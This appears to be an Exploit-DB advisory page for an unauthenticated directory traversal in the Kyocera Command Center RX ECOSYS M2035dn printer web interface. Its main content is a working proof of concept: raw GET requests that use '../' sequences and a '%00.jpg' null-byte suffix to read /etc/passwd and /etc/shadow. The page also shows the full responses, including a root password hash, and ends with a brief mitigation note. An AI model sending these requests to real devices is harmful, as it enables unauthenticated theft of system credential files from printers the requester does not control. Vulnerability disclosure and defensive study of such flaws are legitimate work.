Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)

vendor:

Command Center RX ECOSYS M2035dn

by:

Luis Martinez

9.8

CVSS

CRITICAL

Directory Traversal File Disclosure (Unauthenticated)

CWE

Product Name: Command Center RX ECOSYS M2035dn

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:kyocera:command_center_rx_ecosys_m2035dn

Metasploit:

Other Scripts:

Platforms Tested: Linux

2022

Kyocera Command Center RX ECOSYS M2035dn – Directory Traversal File Disclosure (Unauthenticated)

The Kyocera Command Center RX ECOSYS M2035dn device is vulnerable to a directory traversal attack that allows an unauthenticated user to disclose sensitive files on the system. By crafting a specially crafted payload and adding a nullbyte at the end, an attacker can traverse directories and retrieve files that should not be accessible. This vulnerability can be exploited by sending a malicious GET request to the device.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the Kyocera Command Center RX ECOSYS M2035dn device to the latest version. Additionally, restrict access to the device to trusted networks or implement access controls to prevent unauthenticated access.

Source

Exploit-DB raw data:

# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) 
# Author: Luis Martinez
# Discovery Date: 2022-02-10
# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
# Tested Version: ECOSYS M2035dn
# Tested on: Linux
# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)

# Proof of Concept:
# 1.- Create a directory traversal payload
# 2.- Add nullbyte to the end of the payload(%00)
# 3.- Sent your request

Request 1:

GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*

Response 1:

HTTP/1.1 200 OK
Content-Length: 844
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 15:55:57 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
adm:x:4:4:adm:/var/adm:/bin/sh
lp:x:5:7:lp:/var/spool/lpd:/bin/sh
sync:x:6:8:sync:/bin:/bin/sync
shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
halt:x:8:10:halt:/sbin:/sbin/halt
mail:x:9:11:mail:/var/mail:/bin/sh
news:x:10:12:news:/var/spool/news:/bin/sh
uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
operator:x:12:0:operator:/root:/bin/sh
games:x:13:60:games:/usr/games:/bin/sh
ftp:x:15:14:ftp:/var/ftp:/bin/sh
man:x:16:20:man:/var/cache/man:/bin/sh
www:x:17:18:www-data:/var/www:/bin/sh
sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
proxy:x:19:21:proxy:/bin:/bin/sh
telnetd:x:20:22:proxy:/bin:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
ais:x:101:101:ais:/var/run/ais:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

Request 2:

GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*

Response 2:

HTTP/1.1 200 OK
Content-Length: 480
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 16:10:16 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg

root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
bin:*:15873::::::
daemon:*:15873::::::
sys:*:15873::::::
adm:*:15873::::::
lp:*:15873::::::
sync:*:15873::::::
shutdown:*:15873::::::
halt:*:15873::::::
mail:*:15873::::::
news:*:15873::::::
uucp:*:15873::::::
operator:*:15873::::::
games:*:15873::::::
ftp:*:15873::::::
man:*:15873::::::
www:*:15873::::::
sshd:*:15873::::::
proxy:*:15873::::::
telnetd:*:15873::::::
backup:*:15873::::::
ais:*:15873::::::
nobody:*:15873::::::